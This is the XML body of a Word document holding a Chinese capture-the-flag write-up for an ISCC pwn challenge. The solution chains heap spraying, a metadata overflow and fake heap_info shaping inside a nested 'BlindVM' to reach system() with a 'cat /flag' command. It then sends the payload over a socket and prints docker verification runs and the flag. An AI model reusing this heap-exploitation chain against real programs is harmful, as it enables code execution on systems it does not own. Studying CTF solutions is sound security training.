        </w:rPr>
        <w:t xml:space="preserve">\x02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first chunk: command string for system(...)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x204a0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MINSIZE)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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b'cat /flag;cat /flag.txt;cat flag.txt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'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">edit(ADD_INDEX, cmd)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># heap spraying / gap acquisition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aseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1ff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add(MMAP_THRESHOLD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add(PAGE_SIZE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aseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1ff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add(MMAP_THRESHOLD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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1ff80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add(PAGE_SIZE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prepare fake metadata used during later heap_info / top-chunk shaping</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add_size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HEAP_MAX_SIZE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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">end_size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MMAP_THRESHOLD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add_data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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1020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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x10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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x10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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1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add_size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end_size:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    add(add_size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add_size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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    edit(ADD_INDEX, add_data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># first +4 overflow into next metadata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x18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edit(ADD_INDEX, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'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p32(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1021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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xfe0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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x20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edit(ADD_INDEX, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x30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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x20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more spraying / heap-space stepping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aseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1ff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add(MMAP_THRESHOLD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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1ff80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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x18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edit(ADD_INDEX, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'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p32(HEAP_MAX_SIZE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add(HEAP_MAX_SIZE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add(HEAP_MAX_SIZE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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x18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edit(ADD_INDEX, p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x21000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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x21000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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1000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patch candidate heap_info fields page-by-page</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add_size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HEAP_MAX_SIZE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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">end_size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MMAP_THRESHOLD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">change_idx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0x402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add_size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end_size:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_data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p64(add_size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PAGE_SIZE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TLS_DELTA)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p64(add_size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PAGE_SIZE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TLS_DELTA)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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1000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p64(add_size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0x1fe0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TLS_DELTA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add_size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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    edit(change_idx, add_data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    change_idx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final steps from public BlindVM chain, adapted into this wrapper</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x13C0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0x28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((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x800000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0x1fe0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(MMAP_THRESHOLD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add(MMAP_THRESHOLD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add_size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HEAP_MAX_SIZE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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">end_size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MMAP_THRESHOLD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add_size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end_size:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    add(add_size)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_size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PAGE_SIZE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x3000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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xd4d0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add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x18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edit(ADD_INDEX, p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0F001200004DDE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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x50D70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p64(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x101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finish()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">blind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b''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.join(payloads)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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wrap_blind_payload(blind)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f'[+] blind payload length =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(blind)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f'[+] outer payload length =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(outer)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socket.create_connection((HOST, PORT),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sock.settimeout(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sock.sendall(outer)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b''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sock.recv(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data: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resp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data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sock.close()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(resp.decode(errors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'replace'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rb'ISCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[^}]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\}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resp)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'='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f'[!!!] FLAG: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group(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'='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</w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="27" w:name="header-n230"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证环节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对本题的复盘验证，我主要在三个层面上取得了确定性的观测结果。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="header-n232"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行态必须强制绑定附件给出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loader </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发异常的启动模式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc '/lib64/ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit.bin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将输出：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*** stack smashing detected ***: terminated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">合理的启动模式应为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时终端反馈：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="header-n241"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跨界将载荷写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> smoke test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试通过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit_via_data.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令回显：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述运行结果印证了依托</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">make_via_data_copy()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现“前置绕过合法性检测，后置覆写真实</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷”的战术绝对可行。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="header-n246"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">初期企图覆写外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表的策略已被证伪，崩溃点位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行阶段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; exploit_local.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程返回值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该异常代码提供了一个决定性证明，督促我们将解题思路从“强行从外层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">污染</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表”彻底转向“利用里层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的机制打出堆利用”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="header-n251"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{rblh937s-74ek-xnl2-cc30-2vrcbc0r6dn0}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https://blog.wjhwjhn.com/posts/691ef12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https://blog.wjhwjhn.com/posts/691ef12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2026-05-18T02:53:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T02:53:40Z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